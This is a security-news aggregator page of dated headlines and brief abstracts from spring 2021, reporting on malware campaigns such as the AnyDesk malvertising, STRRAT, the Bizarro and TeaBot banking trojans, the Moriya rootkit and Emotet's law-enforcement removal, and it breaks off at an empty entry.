Cybersecurity researchers on Wednesday publicized the disruption of a "clever" malvertising network targeting AnyDesk that delivered a weaponized installer of the remote desktop software via rogue Google ads that appeared in the search engine results pages. The campaign, which is believed to have begun as early as April 21, 2021, involves a malicious file that masquerades as a setup executable for AnyDesk (AnyDeskSetup.exe), which, upon execution, downloads a PowerShell implant to amass and exfiltrate system information. "The script had some obfuscation and multiple functions that resembled an implant as well as a hardcoded domain (zoomstatistic[.]com) to 'POST' reconnaissance information such as user name, hostname, operating system, IP address and the current process name," researchers from Crowdstrike said in an analysis. AnyDesk's remote desktop access solution has been downloaded by more than 300 million users worldwide, according to the coThe Hacker News
May 27, 2021
Targeted AnyDesk Ads on Google Served Up Weaponized App Full Text
Abstract
Malicious ad campaign was able to rank higher in searches than legitimate AnyDesk ads.Threatpost
May 27, 2021
Melting Ice - Tracking IcedID Servers with a few simple steps Full Text
Abstract
This threat has constantly been growing in the past year and boasts a wide range of malicious capabilities such as browser hooking, credential theft, MiTM proxy setup, and a VNC module, among others.Check Point Research
May 26, 2021
Data Wiper Malware Disguised As Ransomware Targets Israeli Entities Full Text
Abstract
Researchers on Tuesday disclosed a new espionage campaign that resorts to destructive data-wiping attacks targeting Israeli entities since at least December 2020 and that camouflages the malicious activity as ransomware extortions. Cybersecurity firm SentinelOne attributed the attacks to a nation-state actor affiliated with Iran it tracks under the moniker "Agrius." "An analysis of what at first sight appeared to be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets," the researchers said. "The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups." The group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a secondThe Hacker News
May 26, 2021
Malware used zero-day exploit to take screenshots of victims’ Macs Full Text
Abstract
The TCC bypass exploit could have allowed attackers to create ransomware that encrypts protected system files and folders without user knowledge.SCMagazine
May 26, 2021
SolarMarker Backdoor Pretends to be Legit PDFescape Installer Full Text
Abstract
The SolarMarker backdoor pretends to be a legitimate PDFescape installer. It creates an encoded file and then executes a PowerShell command to decode and execute the malicious script.Cyren
May 25, 2021
STRRAT - The RAT that Wants to be a Ransomware Full Text
Abstract
Microsoft is warning against a malware campaign by STRRAT, a RAT first spotted in June 2020. It camouflages as ransomware and supports various features such as logging keystrokes, collecting browser passwords, and running remote commands and PowerShell. Organizations should stay alert and offer tra ...Cyware Alerts - Hacker News
May 24, 2021
MountLocker Using Windows API to Spread as Worm Full Text
Abstract
Experts identified a cybercriminal group called XingLocker that uses a customized MountLocker ransomware version. The latter was spotted using enterprise Windows Active Directory APIs to worm through networks.Cyware Alerts - Hacker News
May 23, 2021
A malware attack hit the Alaska Health Department Full Text
Abstract
The Alaska health department website was forced offline by a malware attack; officials are investigating the incident. The website of the Alaska health department was forced offline this week by a malware attack. Local authorities launched an investigation...Security Affairs
May 22, 2021
Bizarro banking malware targets 70 banks in Europe and South America Full Text
Abstract
A banking trojan named Bizarro that originates from Brazil has crossed the borders and started to target customers of 70 banks in Europe and South America.BleepingComputer
May 21, 2021
Security Flaws in Stalkerware Apps are a Growing Danger Full Text
Abstract
Security analysts at ESET identified 158 privacy and security issues in 58 Android stalkerware apps that could lead to account and device hijacking, data manipulation, and remote code execution, among others.Cyware Alerts - Hacker News
May 21, 2021
Microsoft Warns of Data Stealing Malware That Pretends to Be Ransomware Full Text
Abstract
Microsoft on Thursday warned of a "massive email campaign" that's pushing a Java-based STRRAT malware to steal confidential data from infected systems while disguising itself as a ransomware infection. "This RAT is infamous for its ransomware-like behavior of appending the file name extension .crimson to files without actually encrypting them," the Microsoft Security Intelligence team said in a series of tweets. The new wave of attacks, which the company spotted last week, commences with spam emails sent from compromised email accounts with "Outgoing Payments" in the subject line, luring the recipients into opening malicious PDF documents that claim to be remittances, but in reality, connect to a rogue domain to download the STRRAT malware. Besides establishing connections to a command-and-control server during execution, the malware comes with a range of features that allow it to collect browser passwords, log keystrokes, and run remote commandThe Hacker News
May 20, 2021
AHK Rat Loader Delivers Multiple RATs Full Text
Abstract
A malware campaign that has been undergoing constant development in its toolsets since February now boasts four different malware versions, all of which start with an AHK executable that leads to the different VBScripts.Cyware Alerts - Hacker News
May 20, 2021
STRRAT RAT spreads masquerading as ransomware Full Text
Abstract
Microsoft warns of a malware campaign that is spreading a RAT named STRRAT masquerading as ransomware. Microsoft Security Intelligence researchers uncovered a malware campaign that is spreading a remote access trojan (RAT) tracked as STRRAT....Security Affairs
May 20, 2021
Apple Exec Calls Level of Mac Malware ‘Unacceptable’ Full Text
Abstract
Company is using threat of attacks as defense in case brought against it by Epic Games after Fortnite was booted from the App Store for trying to circumvent developer fees.Threatpost
May 20, 2021
Fake Microsoft Authenticator extension discovered in Chrome Store Full Text
Abstract
According to the report, the fake Microsoft Authenticator extension was made available on April 23 this year after failing to be spotted by Google’s security systems and has reached 448 users.Bitdefender
May 20, 2021
BazarCall: Call Centers Help Spread BazarLoader Malware Full Text
Abstract
In February, researchers began reporting a call center-based method of distributing BazarLoader. It utilizes trial subscription-themed emails that encourage potential victims to call a phone number.Palo Alto Networks
May 19, 2021
Bizarro Trojan: Fiercely Stealing Banking Information Full Text
Abstract
A new banking trojan that can harvest bank account logins from Android mobile users is now spreading quickly in multiple regions. Banking customers are recommended to stay vigilant.Cyware Alerts - Hacker News
May 19, 2021
TeamTNT’s Extended Credential Harvester Targets Cloud Services, Other Software Full Text
Abstract
The cybercriminal group TeamTNT is no stranger to targeting cloud containers, expanding their arsenal to steal cloud credentials, and exploring other environments and intrusive activities.Trend Micro
May 19, 2021
New WastedLoader Campaign Delivered Through RIG Exploit Kit Full Text
Abstract
In February 2021, Bitdefender researchers identified a new RIG Exploit Kit campaign exploiting two scripting engine vulnerabilities in unpatched Internet Explorer browsers.Bitdefender
May 18, 2021
Stalkerware Apps Riddled with Security Bugs Full Text
Abstract
Attackers can take advantage of the fact these apps access, gather, store and transmit more information than any other app their victims have installed.Threatpost
May 18, 2021
Bizarro banking Trojan targets banks in Brazil and abroad Full Text
Abstract
Bizarro is a new sophisticated Brazilian banking trojan that is targeting customers of tens of banks in Europe and South America. Researchers from Kaspersky have spotted a new sophisticated Brazilian banking trojan dubbed Bizarro that is targeting...Security Affairs
May 18, 2021
Magecart Hackers Spreading Malicious PHP Web Shells Full Text
Abstract
A Magecart Group continues to distribute new malware wherein attackers hide the PHP-based web shell malware—masked as a favicon—into the targeted sites. The cybercrime syndicate is intensifying its efforts to compromise online stores with a wide range of attack vectors.Cyware Alerts - Hacker News
May 17, 2021
Android stalkerware, a danger for victims and stalkers Full Text
Abstract
ESET research shows that Android stalkerware apps are affected by vulnerabilities that further threaten victims. ESET research reveals that common Android stalkerware apps are affected by vulnerabilities that could expose the privacy and security...Security Affairs
May 17, 2021
Bizarro Banking Trojan Sports Sophisticated Backdoor Full Text
Abstract
The advanced Brazilian malware has gone global, harvesting bank logins from Android mobile users.Threatpost
May 17, 2021
Experts Warn About Ongoing AutoHotkey-Based Malware Attacks Full Text
Abstract
Cybersecurity researchers have uncovered an ongoing malware campaign that heavily relies on the AutoHotkey (AHK) scripting language to deliver multiple remote access trojans (RATs) such as Revenge RAT, LimeRAT, AsyncRAT, Houdini, and Vjw0rm on target Windows systems. At least four different versions of the campaign have been spotted starting February 2021, according to researchers from Morphisec Labs. "The RAT delivery campaign starts from an AutoHotKey (AHK) compiled script," the researchers noted. "This is a standalone executable that contains the following: the AHK interpreter, the AHK script, and any files it has incorporated via the FileInstall command. In this campaign, the attackers incorporate malicious scripts/executables alongside a legitimate application to disguise their intentions." AutoHotkey is an open-source custom scripting language for Microsoft Windows that's meant to provide easy hotkeys for macro-creation and software automation, enablinThe Hacker News
May 17, 2021
Clark County confirms malware shut down computer servers Full Text
Abstract
The county’s 911 system remained working amid the incident. Elements of the county’s server are gradually coming back online. However, county officials say the process is still ongoing.Springfield News-Sun
May 16, 2021
MSBuild tool used to deliver RATs filelessly Full Text
Abstract
Hackers abuse Microsoft Build Engine (MSBuild) to filelessly deliver malware, including RATs and password stealers, on targeted Windows systems. Researchers from Anomali observed threat actors abusing Microsoft Build Engine (MSBuild) to filelessly deliver...Security Affairs
May 14, 2021
Hackers Using Microsoft Build Engine to Deliver Malware Filelessly Full Text
Abstract
Threat actors are abusing Microsoft Build Engine (MSBuild) to filelessly deliver remote access trojans and password-stealing malware on targeted Windows systems. The actively ongoing campaign is said to have emerged last month, researchers from cybersecurity firm Anomali said on Thursday, adding that the malicious build files came embedded with encoded executables and shellcode that deploy backdoors, allowing the adversaries to take control of the victims' machines and steal sensitive information. MSBuild is an open-source build tool for .NET and Visual Studio developed by Microsoft that allows for compiling source code and packaging, testing, and deploying applications. In using MSBuild to filelessly compromise a machine, the idea is to stay under the radar and thwart detection, as such malware makes use of a legitimate application to load the attack code into memory, thereby leaving no traces of infection on the system and giving attackers a high level of stealth. As of writing, oThe Hacker News
May 14, 2021
RevengeRAT and AsyncRAT target aerospace and travel sectors Full Text
Abstract
A campaign of remote access trojans is targeting the aerospace and travel industries with spear-phishing emails that distribute an actively developed loader, which then delivers RevengeRAT or AsyncRAT.SCMagazine
May 14, 2021
FIN7 Backdoor Masquerades as Ethical Hacking Tool Full Text
Abstract
The financially motivated cybercrime gang behind the Carbanak RAT is back with the Lizar malware, which can harvest all kinds of info from Windows machines.Threatpost
May 14, 2021
Microsoft Alerts Aviation and Travel Firms to RAT Campaign Full Text
Abstract
Sophisticated crypter-as-a-service ultimately leads to data theftInfosecurity Magazine
May 14, 2021
Snip3 Crypter Service Delivers Multiple RAT Families Full Text
Abstract
Researchers have recently monitored a highly sophisticated Crypter-as-a-Service that delivers multiple RAT families onto target machines through phishing emails. Besides, it has the ability to distinguish sandboxing and virtual environments and deliver malware accordingly.Cyware Alerts - Hacker News
May 13, 2021
Fresh Loader Targets Aviation Victims with Spy RATs Full Text
Abstract
The campaign is harvesting screenshots, keystrokes, credentials, webcam feeds, browser and clipboard data and more, with RevengeRAT or AsyncRAT payloads.Threatpost
May 13, 2021
Microsoft build tool abused to deliver password-stealing malware Full Text
Abstract
Threat actors are abusing the Microsoft Build Engine (MSBuild) to deploy remote access tools and information-stealing malware filelessly as part of an ongoing campaign.BleepingComputer
May 12, 2021
Lemon Duck Cryptominer has Made a Comeback Full Text
Abstract
Microsoft Exchange servers are once again under attack by the Lemon Duck cryptocurrency mining botnet, which recently beefed up its anti-detection capabilities. Organizations should stay vigilant against this threat and use reliable anti-malware defenses.Cyware Alerts - Hacker News
May 12, 2021
A Triple Combo of DoubleDrop, DoubleDrag, and DoubleBack Malware Full Text
Abstract
Three new malware DOUBLEDRAG, DOUBLEDROP, and DOUBLEBACK, associated with a massive cyberespionage campaign, have been targeting several organizations in the U.S. The related phishing attacks were carried out by a new financially motivated threat actor group dubbed UNC2529.Cyware Alerts - Hacker News
May 12, 2021
21Nails Exim Bugs and Remote Code Execution: Beware Full Text
Abstract
The Qualys Research Team found 10 remotely exploitable and 11 locally exploitable security flaws, collectively known as 21Nails. Versions prior to Exim 4.94.2 are vulnerable to attacks exploiting 21Nails.Cyware Alerts - Hacker News
May 12, 2021
Microsoft: Threat actors target aviation orgs with new malware Full Text
Abstract
Microsoft warns of an ongoing spear-phishing campaign targeting aerospace and travel organizations with multiple remote access trojans (RATs) deployed using a new and stealthy malware loader.BleepingComputer
May 12, 2021
TeaBot Android banking Trojan targets banks in Europe Full Text
Abstract
Malware researchers from Cleafy warn of a new Android banking trojan dubbed TeaBot (aka Anatsa) that is targeting banks in Europe. Malware experts from the Italian cybersecurity firm Cleafy have spotted a new Android banking trojan dubbed TeaBot (aka...Security Affairs
May 12, 2021
TeaBot Trojan Targets Banks via Hijacked Android Handsets Full Text
Abstract
Malware first observed in Italy can steal victims’ credentials and SMS messages as well as livestream device screens on demand.Threatpost
May 11, 2021
Fake Chrome App Anchors Rapidly Worming ‘Smish’ Cyberattack Full Text
Abstract
An ingenious attack on Android devices self-propagates, with the potential for a range of damage.Threatpost
May 11, 2021
Apple was aware that XcodeGhost impacted 128 Million iOS Users in 2015 Full Text
Abstract
Court documents revealed that the infamous XcodeGhost malware, which has been active since 2015, infected 128 million iOS users. Documents provided in a court case that sees Epic Games v. Apple Inc. revealed that the XcodeGhost malware impacted...Security Affairs
May 11, 2021
Experts warn of a new Android banking trojan stealing users’ credentials Full Text
Abstract
Cybersecurity researchers on Monday disclosed a new Android trojan that hijacks users' credentials and SMS messages to facilitate fraudulent activities against banks in Spain, Germany, Italy, Belgium, and the Netherlands. Called "TeaBot" (or Anatsa), the malware is said to be in its early stages of development, with malicious attacks targeting financial apps commencing in late March 2021, followed by a rash of infections in the first week of May against Belgium and Netherlands banks. The first signs of TeaBot activity emerged in January. "The main goal of TeaBot is stealing victim's credentials and SMS messages for enabling frauds scenarios against a predefined list of banks," Italian cybersecurity and online fraud prevention firm Cleafy said in a Monday write-up. "Once TeaBot is successfully installed in the victim's device, attackers can obtain a live streaming of the device screen (on demand) and also interact with it via Accessibility SerThe Hacker News
May 7, 2021
Panda Stealer: Spreading via Spam Emails and Discord Full Text
Abstract
Panda Stealer, a new cryptocurrency-stealing malware variant, has been found spreading through a global spam campaign and potentially through Discord channels. It is targeting individuals across the U.S., Australia, Japan, and Germany.Cyware Alerts - Hacker News
May 7, 2021
Buer malware rewritten in Rust language to curb detection Full Text
Abstract
Researchers said that the last few years saw malware authors adopting newer coding languages at a more rapid pace.SCMagazine
May 7, 2021
New Moriya Rootkit Used in the Wild to Backdoor Windows Systems Full Text
Abstract
Moriya rootkit is used by an unknown actor to deploy passive backdoors on public-facing servers, facilitating the creation of a covert C2 communication channel through which they can be controlled.Kaspersky Labs
May 7, 2021
Researchers use PyInstaller to create stealth malware Full Text
Abstract
Instead of obfuscating code and creating an untraceable malware packer from scratch, cybercriminals could take advantage of PyInstaller to create packers that are not caught in scans.Tech Target
May 07, 2021
New Stealthy Rootkit Infiltrated Networks of High-Profile Organizations Full Text
Abstract
An unknown threat actor with the capabilities to evolve and tailor its toolset to target environments infiltrated high-profile organizations in Asia and Africa with an evasive Windows rootkit since at least 2018. Called 'Moriya,' the malware is a "passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them," said Kaspersky researchers Mark Lechtik and Giampaolo Dedola in a Thursday deep-dive. The Russian cybersecurity firm termed the ongoing espionage campaign 'TunnelSnake.' Based on telemetry analysis, less than 10 victims around the world have been targeted to date, with the most prominent victims being two large diplomatic entities in Southeast Asia and Africa. All the other victims were located in South Asia. The first reports of Moriya emerged last November when Kaspersky said it discovered the stealthy implant in the networksThe Hacker News
May 6, 2021
Pingback Malware Using ICMP for Covert Communication Full Text
Abstract
A new Windows malware called Pingback has been found using a DLL hijacking attack to target Microsoft Windows 64-bit systems. The malware takes advantage of ICMP for its command-and-control activities.Cyware Alerts - Hacker News
May 6, 2021
Buer Downloader: Now Using Rust to Hide Itself Full Text
Abstract
A new malicious campaign, masquerading as shipping notices from DHL, was found deploying the latest Buer malware loader variant written in Rust. The new update in Buer helps attackers evade detection and increase successful click rates.Cyware Alerts - Hacker News
May 6, 2021
Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware | McAfee Blogs Full Text
Abstract
Since January 2021, Roaming Mantis has been targeting Japanese users with a new malware called SmsSpy. The malicious code infects Android users using one of two variants based on the version of OS.McAfee
May 06, 2021
New Moriya rootkit used in the wild to backdoor Windows systems Full Text
Abstract
A new stealthy rootkit was used by an unknown threat actor to backdoor targeted Windows systems in a likely ongoing espionage campaign dubbed TunnelSnake and going back to at least 2018.BleepingComputer
May 6, 2021
RaccoonStealer Malware Group Leaves Millions of Stolen Authentication Cookies Exposed in Unsecured Server Full Text
Abstract
This type of malware infects devices and then collects user credentials from web browsers, FTP, and email clients, data that is later uploaded to command and control (C&C) servers.The Record
May 5, 2021
180+ OAuth 2.0 cloud malware apps detected Full Text
Abstract
Cloud malware can be used to conduct reconnaissance, launch employee-to-employee attacks, and steal files and emails from cloud platforms.SCMagazine
May 5, 2021
Panda Stealer Targets Crypto Wallets Full Text
Abstract
Crypto wallets and Discord credentials among targets of new information stealerInfosecurity Magazine
May 5, 2021
BazarLoader Downloader is Using Social Engineering Techniques Full Text
Abstract
It has been discovered in two separate cyberattack campaigns. Both the campaigns employed unique social engineering techniques and popular products used in many organizations.Cyware Alerts - Hacker News
May 04, 2021
New Pingback Malware Using ICMP Tunneling to Evade C&C Detection Full Text
Abstract
Researchers on Tuesday disclosed a novel malware that uses a variety of tricks to stay under the radar and evade detection, while stealthily capable of executing arbitrary commands on infected systems. Called 'Pingback,' the Windows malware leverages Internet Control Message Protocol (ICMP) tunneling for covert bot communications, allowing the adversary to utilize ICMP packets to piggyback attack code, according to an analysis published today by Trustwave. Pingback ("oci.dll") achieves this by getting loaded through a legitimate service called MSDTC (Microsoft Distributed Transaction Coordinator) — a component responsible for handling database operations that are distributed over multiple machines — by taking advantage of a method called DLL search order hijacking, which involves using a genuine application to preload a malicious DLL file. Naming the malware as one of the plugins required for supporting the Oracle ODBC interface in MSDTC is key to the attaThe Hacker News
May 04, 2021
New Windows ‘Pingback’ malware uses ICMP for covert communication Full Text
Abstract
Today, Trustwave researchers have disclosed their findings on a novel Windows malware sample that uses Internet Control Message Protocol (ICMP) for its command-and-control (C2) activities. Dubbed "Pingback," this malware targets Windows 64-bit systems, and uses DLL Hijacking to gain persistence.BleepingComputer
May 3, 2021
WeSteal Stealer and WeControl RAT - The New Commodity Malware in Town Full Text
Abstract
Malware curators often peddle their creations in underground forums in creative ways. Now, a new malware is being shamelessly marketed as the leading way to make money in 2021.Cyware Alerts - Hacker News
May 3, 2021
RotaJakiro Stayed Hidden for Several Years Full Text
Abstract
A new malware backdoor in the town is giving a tough time to researchers by using a double encryption algorithm, a combination of AES and XOR, to stay under the radar.Cyware Alerts - Hacker News
May 3, 2021
Hackers Abuse Excel 4.0 Macros to Deliver ZLoader and Quakbot Malware Full Text
Abstract
The Excel 4.0 macros are quite old, but hackers are targeting them because they provide paths to access powerful functionality such as interaction with the operating system (OS).GB Hackers
May 03, 2021
A Rust-based Buer Malware Variant Has Been Spotted in the Wild Full Text
Abstract
Cybersecurity researchers on Monday disclosed a new malspam campaign distributing a fresh variant of a malware loader called 'Buer' written in Rust, illustrating how adversaries are constantly honing their malware toolsets to evade analysis. Dubbed "RustyBuer," the malware is distributed via emails masquerading as shipping notices from DHL Support, and is said to have affected no fewer than 200 organizations across more than 50 verticals since early April. "The new Buer variant is written in Rust, an efficient and easy-to-use programming language that is becoming increasingly popular," Proofpoint researchers said in a report shared with The Hacker News. "Rewriting the malware in Rust enables the threat actor to better evade existing Buer detection capabilities." First introduced in August of 2019, Buer is a modular malware-as-a-service offering that's sold on underground forums and used as a first-stage downloader to deliver additionalThe Hacker News
May 03, 2021
New Chinese Malware Targeted Russia’s Largest Nuclear Submarine Designer Full Text
Abstract
A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces. The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed "PortDoor," according to Cybereason's Nocturnus threat intelligence team. "Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers said in a write-up on Friday. Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting foThe Hacker News
May 2, 2021
WeSteal, a shameless commodity cryptocurrency stealer available for sale Full Text
Abstract
The bold author of a new cryptocurrency stealer, dubbed WeSteal, is promising its customers a leading way to make money in 2021. A new cryptocurrency stealer dubbed WeSteal is available on the cybercrime underground, unlike other commodity cryptocurrency...Security Affairs
May 1, 2021
The Return of Dridex Banking Trojan Full Text
Abstract
Scammers have been found sending QuickBooks invoices to infect victims’ devices with Dridex banking malware. About 14% of the malicious emails reached U.S. clients and 11% to South Korea.Cyware Alerts - Hacker News
April 30, 2021
Researchers sound the alarm after GitHub floats stricter policies Full Text
Abstract
GitHub on Thursday solicited the comments of the security research community on its new, apparently stricter policies for posting malware and proof-of-concept exploits.SCMagazine
April 30, 2021
PortDoor Espionage Malware Takes Aim at Russian Defense Sector Full Text
Abstract
The stealthy backdoor is likely being used by Chinese APTs, researchers said.Threatpost
April 30, 2021
Fake Replica Sites of 900 Global News Outlets Target Users with Malware and Scam Advertisements Full Text
Abstract
In perhaps one of the biggest phishing incidents targeting some of the world’s largest news organizations, hackers have created fake replica websites of news portals of 900 global news portals.The Times Of India
April 29, 2021
ToxicEye RAT is Exploiting Telegram Platform Full Text
Abstract
Private messaging app Telegram is being exploited by cyberattackers who are delivering a ToxicEye RAT to take control over a hacker-operated Telegram account and leak critical data.Cyware Alerts - Hacker News
April 29, 2021
Purple Lambert, a new malware of CIA-linked Lambert APT group Full Text
Abstract
Cybersecurity firm Kaspersky discovered a new strain of malware that is believed to be part of the arsenal of the US Central Intelligence Agency (CIA). Cybersecurity firm Kaspersky has discovered a new malware that experts attribute to the US Central...Security Affairs
April 29, 2021
Researchers Uncover Stealthy Linux Malware That Went Undetected for 3 Years Full Text
Abstract
A previously undocumented Linux malware with backdoor capabilities has managed to stay under the radar for about three years, allowing the threat actor behind the operation to harvest and exfiltrate sensitive information from infected systems. Dubbed "RotaJakiro" by researchers from Qihoo 360 NETLAB, the backdoor targets Linux X64 machines, and is so named after the fact that "the family uses rotate encryption and behaves differently for root/non-root accounts when executing." The findings come from an analysis of a malware sample it detected on March 25, although early versions appear to have been uploaded to VirusTotal as early as May 2018. A total of four samples have been found to date on the database, all of which remain undetected by most anti-malware engines. As of writing, only seven security vendors flag the latest version of the malware as malicious. "At the functional level, RotaJakiro first determines whether the user is root or non-The Hacker News
April 29, 2021
Water Pamola Campaign Targeted E-Commerce Sites in Japan, Australia, and Europe via Malicious Orders Full Text
Abstract
Water Pamola sent online shopping orders appended with a malicious XSS script to attack e-commerce administrators. These scripts were managed with an XSS attack framework called "XSS.ME."Trend Micro
April 29, 2021
New Shameless WeSteal Commodity Cryptocurrency Stealer and WeControl Commodity RAT Full Text
Abstract
The author of WeSteal, a new commodity cryptocurrency stealer, makes no attempt to disguise the intent for his malware. The seller promises “the leading way to make money in 2021”.Palo Alto Networks
April 28, 2021
Malware Increasingly Using TLS to Hide Communication Full Text
Abstract
Malware actors have doubled the number of attacks leveraging TLS communications, helping them stay hidden from security systems. Only a few are using self-signed certificates.Cyware Alerts - Hacker News
April 28, 2021
New stealthy Linux malware used to backdoor systems for years Full Text
Abstract
A recently discovered Linux malware with backdoor capabilities has flown under the radar for years, allowing attackers to harvest and exfiltrate sensitive information from compromised devices.BleepingComputer
April 28, 2021
Attention! FluBot Android Banking Malware Spreads Quickly Across Europe Full Text
Abstract
Attention, Android users! A banking malware capable of stealing sensitive information is "spreading rapidly" across Europe, with the U.S. likely to be the next target. According to a new analysis by Proofpoint, the threat actors behind FluBot (aka Cabassous) have branched out beyond Spain to target the U.K., Germany, Hungary, Italy, and Poland. The English-language campaign alone has been observed to make use of more than 700 unique domains, infecting about 7,000 devices in the U.K. In addition, German and English-language SMS messages were found being sent to U.S. users from Europe, which Proofpoint suspects could be the result of malware propagating via contact lists stored on compromised phones. A concerted campaign aimed at the U.S. is yet to be detected. FluBot, a nascent entry in the banking trojan landscape, began its operations late last year, with campaigns leveraging the malware infecting more than 60,000 users in Spain, according to an analysis published bThe Hacker News
April 28, 2021
RedLine Stealer Masquerades as Telegram Installer Full Text
Abstract
The .Net based malware has recently been disguised as an installer of the popular secure messaging app Telegram. Like most .Net malware, the fake setup file is packed and highly obfuscated.Minerva Labs
April 27, 2021
WhatsApp Pink Malware Can Auto-Reply to Multiple Messaging Apps Full Text
Abstract
A new version of WhatsApp is making rounds. It claims to give you an enhanced version of WhatsApp with additional features but the truth is that this WhatsApp clone app is malicious.Cyware Alerts - Hacker News
April 27, 2021
New ICS Threat Activity Group: TALONITE Full Text
Abstract
TALONITE gains initial network access via spearphishing that leverages malicious documents and executables focused on engineering-specific themes and concepts to distribute FlowCloud and LookBack.Dragos
April 27, 2021
Dridex Malware Returns In a New Global QuickBooks Malspam Campaign Full Text
Abstract
Phishing attacks masquerading as QuickBooks invoices are targeting users of the popular accounting software in an attempt to infect victims' devices with the infamous Dridex banking Trojan.Bitdefender
April 27, 2021
Microsoft Defender uses Intel TDT technology against crypto-mining malware Full Text
Abstract
Microsoft announced an improvement of its Defender antivirus that will leverage Intel's Threat Detection Technology (TDT) to detect processes associated with crypto-miners. Microsoft announced that Microsoft Defender for Endpoint, its commercial version...Security Affairs
April 27, 2021
Shlayer macOS malware abuses zero-day to bypass Gatekeeper feature Full Text
Abstract
Apple addresses a zero-day in macOS exploited by Shlayer malware to bypass Apple's security features and deliver second-stage malicious payloads. Apple has addressed a zero-day flaw in macOS that was exploited by Shlayer malware to bypass Apple's...Security Affairs
April 26, 2021
Microsoft Defender now blocks cryptojacking malware using Intel TDT Full Text
Abstract
Microsoft today announced that Microsoft Defender for Endpoint, the enterprise version of its Windows 10 Defender antivirus, now comes with support for blocking cryptojacking malware using Intel's silicon-based Threat Detection Technology (TDT).BleepingComputer
April 26, 2021
European Law Enforcement Uses Customized DLL to Wipe Emotet Malware from Infected Windows PCs Full Text
Abstract
The code was distributed at the end of January to Emotet-infected computers by the malware's command-and-control (C2) infrastructure, which had just been seized in a multinational police operation.The Register
April 26, 2021
Minnesota University Apologizes for Contributing Malicious Code to the Linux Project Full Text
Abstract
Researchers from the University of Minnesota apologized to the maintainers of Linux Kernel Project on Saturday for intentionally including vulnerabilities in the project's code, which led to the school being banned from contributing to the open-source project in the future. "While our goal was to improve the security of Linux, we now understand that it was hurtful to the community to make it a subject of our research, and to waste its effort reviewing these patches without its knowledge or permission," assistant professor Kangjie Lu, along with graduate students Qiushi Wu and Aditya Pakki, said in an email. "We did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches," they added. The apology comes over a study into what's called "hypocrite commits," which was published earlier this February. The project aimed to deliberately add use-after-free vulnerabilThe Hacker News
April 26, 2021
Malware Attack at Technology Provider Radixx Causes Outages in Airline Reservation Systems Full Text
Abstract
Radixx, a technology provider, says a malware attack triggered a dayslong outage that has caused reservations systems to crash at about 20 low-cost airlines around the world.Washington Post
April 26, 2021
Emotet Malware Destroys Itself Today From All Infected Computers Full Text
Abstract
Emotet, the notorious email-based Windows malware behind several botnet-driven spam campaigns and ransomware attacks, was automatically wiped from infected computers en masse following a European law enforcement operation. The development comes three months after a coordinated disruption of Emotet as part of "Operation Ladybird" to seize control of servers used to run and maintain the malware network. The orchestrated effort saw at least 700 servers associated with the botnet's infrastructure neutered from the inside, thus preventing further exploitation. Law enforcement authorities from the Netherlands, Germany, the U.S., U.K., France, Lithuania, Canada, and Ukraine were involved in the international action. Previously, the Dutch police, which seized two central servers located in the country, said it had deployed a software update to counter the threat posed by Emotet effectively. "All infected computer systems will automatically retrieve the update there, aThe Hacker News
April 25, 2021
Emotet malware nukes itself today from all infected computers worldwide Full Text
Abstract
Emotet, one of the most dangerous email spam botnets in recent history, is being uninstalled today from all infected devices with the help of a malware module delivered in January by law enforcement.BleepingComputer
April 24, 2021
Prometei: Yet Another Malware Weaponizing Proxylogon Vulnerabilities Full Text
Abstract
The Prometei variant used in the recent attack was found to provide the attackers with a stealthy and sophisticated backdoor that supported a wide range of tasks, along with harvesting credentials.Cyware Alerts - Hacker News
April 24, 2021
New cryptomining malware builds an army of Windows, Linux bots Full Text
Abstract
A recently discovered cryptomining botnet is actively scanning for vulnerable Windows and Linux enterprise servers and infecting them with Monero (XMRig) miner and self-spreader malware payloads.BleepingComputer
April 24, 2021
XCSSET Malware is Now Targeting Apple’s M1 Chip Full Text
Abstract
A Mac malware has been re-engineered and is being used in a campaign aimed at Apple’s new M1 chips, with the goal of stealing data associated with popular applications including Evernote, WeChat, and more.Cyware Alerts - Hacker News
April 24, 2021
Fake Microsoft DirectX 12 site pushes crypto-stealing malware Full Text
Abstract
Cybercriminals have created a fake Microsoft DirectX 12 download page to distribute malware that steals your cryptocurrency wallets and passwords.BleepingComputer
April 24, 2021
ToxicEye RAT exploits Telegram communications to steal data from victims Full Text
Abstract
ToxicEye is a new Remote Access Trojan (RAT) that exploits the Telegram service as part of its command and control infrastructure. ToxicEye RAT is a new malware that leverages the Telegram service for command & control, experts from Check Point...Security Affairs
April 23, 2021
TLS-Encrypted Malware Volumes Double in Just Months Full Text
Abstract
Sophos warns of increasing use of legitimate web services to hide malwareInfosecurity Magazine
April 22, 2021
Malware operators leverage TLS in 46% of detected communications Full Text
Abstract
Malware operators have also been adopting TLS for essentially the same reasons as legitimate companies: To prevent defenders from detecting and stopping the deployment of malware and data theft.SCMagazine
April 22, 2021
Telegram Platform Abused in ‘ToxicEye’ Malware Campaigns Full Text
Abstract
Even if the app is not installed or in use, threat actors can use it to spread malware through email campaigns and take over victims’ machines, new research has found.Threatpost
April 22, 2021
Attackers can hide ‘external sender’ email warnings with HTML and CSS Full Text
Abstract
The "external sender" warnings shown to email recipients by clients like Microsoft Outlook can be hidden by the sender, as demonstrated by a researcher. Turns out, all it takes for attackers to alter the "external sender" warning, or remove it altogether from emails is just a few lines of HTML and CSS code.BleepingComputer
April 22, 2021
Another Malware Made its Way in Google Play Store Full Text
Abstract
A new set of malicious Android apps out there are impersonating security scanner apps on the official Play Store to steal sensitive information or even take full control of users' devices.Cyware Alerts - Hacker News
April 21, 2021
Novel Email-Based Campaign Targets Bloomberg Clients with RATs Full Text
Abstract
